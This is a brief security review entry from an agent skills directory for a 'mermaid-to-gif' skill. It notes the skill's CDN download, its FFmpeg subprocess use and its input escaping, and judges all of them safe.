The Agent Skills Directory

[EXTERNAL_DOWNLOADS]: The script fetches the Mermaid.js library from the JSDelivr CDN (https://cdn.jsdelivr.net/npm/mermaid) during the rendering process in the headless browser. JSDelivr is a well-known and trusted content delivery network.- [COMMAND_EXECUTION]: The script utilizes the FFmpeg command-line tool via the subprocess module to perform palette generation and GIF assembly from captured image frames. The arguments passed to FFmpeg are structured as a list, which prevents shell injection.- [SAFE]: The skill implements security best practices by using html.escape() on user-provided Mermaid code before embedding it into the HTML template for rendering. This prevents cross-site scripting (XSS) or code execution within the Playwright browser context, even though Mermaid is initialized with securityLevel: 'loose' to support advanced diagram features.- [SAFE]: File operations are restricted to reading the input files specified by the user and writing to a local output directory or temporary system directory.

mermaid-to-gif